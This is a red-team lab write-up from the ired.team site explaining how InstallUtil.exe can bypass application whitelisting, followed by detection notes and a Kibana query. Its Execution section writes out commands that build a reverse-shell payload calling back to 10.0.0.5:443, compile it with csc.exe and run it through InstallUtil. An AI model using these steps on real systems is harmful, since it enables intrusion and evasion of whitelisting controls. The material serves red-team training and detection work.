Red Teaming Experiments
linkedingithub@spotheplanetpatreon
Search…
What is ired.team?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
offensive security
Red Team Infrastructure
Initial Access
Code Execution
regsvr32
MSHTA
Control Panel Item
Executing Code as a Control Panel Item through an Exported Cplapplet Function
Code Execution through Control Panel Add-ins
CMSTP
InstallUtil
Using MSBuild to Execute Shellcode in C#
Forfiles Indirect Command Execution
Application Whitelisting Bypass with WMIC and XSL
Powershell Without Powershell.exe
Powershell Constrained Language Mode ByPass
Forcing Iexplore.exe to Load a Malicious DLL via COM Abuse
pubprn.vbs Signed Script Code Execution
Code & Process Injection
Defense Evasion
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Lateral Movement
Persistence
Exfiltration
reversing, forensics & misc
Internals
Cloud
Neo4j
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered By GitBook
InstallUtil
InstallUtil code execution - bypass application whitelisting.

Execution

First of, let's generate a C# payload (with InstallUtil script) that contains shellcode from msfvenom and upload the temp.cs file to victim's machine:
[email protected]
1
python InstallUtil.py --cs_file temp.cs --exe_file temp.exe --payload windowsreverse_shell_tcp --lhost 10.0.0.5 --lport 443
Copied!
Compile the .cs to an .exe:
[email protected]
1
PS C:\Windows\Microsoft.NET\Framework\v4.0.30319> .\csc.exe C:\experiments\installUtil\temp.cs
Copied!
Execute the payload:
[email protected]
1
PS C:\Windows\Microsoft.NET\Framework\v4.0.30319> .\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\Microsoft.NET\Framework\v4.0.30319\temp.exe
2
Microsoft (R) .NET Framework Installation utility Version 4.0.30319.17929
3
Copyright (C) Microsoft Corporation. All rights reserved.
4
​
5
Hello From Uninstall...I carry out the real work...
Copied!
Enjoy the sweet reverse shell:

Observations

Look for InstallUtil processes that have established connections, especially those with cmd or powershell processes running as children - you should treat them as suspicious and investigate the endpoint closer:
A very primitive query in kibana allowing to find events where InstallUtil spawns cmd:
kibana
1
event_data.ParentCommandLine:"*installutil.exe*" && event_data.Image:cmd.exe
Copied!
InstallUtil launching the malicious payload
csc.exe created a temp.exe which contains the reverse shell payload
What is interesting is that I could not see an established network connection logged in sysmon logs, although I could see other network connections from the victim machine being logged.
Will be coming back to this one for further inspection - possibly related to sysmon configuration.

References

Signed Binary Proxy Execution: InstallUtil, Sub-technique T1218.004 - Enterprise | MITRE ATT&CK®
GitHub - khr0x40sh/WhiteListEvasion: Collection of scripts, binaries and the like to aid in WhiteList Evasion on a Microsoft Windows Network.
GitHub
Previous
CMSTP
Next
Using MSBuild to Execute Shellcode in C#
Last modified 2yr ago
Copy link
Contents
Execution
Observations
References